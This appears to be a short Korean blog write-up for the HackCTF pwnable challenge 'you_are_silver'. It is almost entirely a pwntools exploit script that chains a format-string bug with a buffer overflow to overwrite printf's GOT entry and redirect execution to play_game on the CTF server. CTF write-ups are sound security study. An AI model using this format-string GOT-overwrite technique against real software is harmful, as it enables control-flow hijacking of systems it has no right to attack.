fsb랑 bof를 연계하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3022)
e = ELF('./you_are_silver')
context.arch = 'amd64'
payload = fmtstr_payload(6, {e.got['printf']:e.sym['play_game']})
payload += 'X'*(46-len(payload))
r.sendline(payload)
r.interactive()'HackCTF' 카테고리의 다른 글
| HackCTF - Unexploitable #1 (0) | 2021.11.26 |
|---|---|
| HackCTF - ROP (0) | 2021.11.26 |
| HackCTF - UAF (0) | 2021.11.26 |
| HackCTF - Pwning (0) | 2021.11.22 |
| HackCTF - Gift (0) | 2021.11.22 |
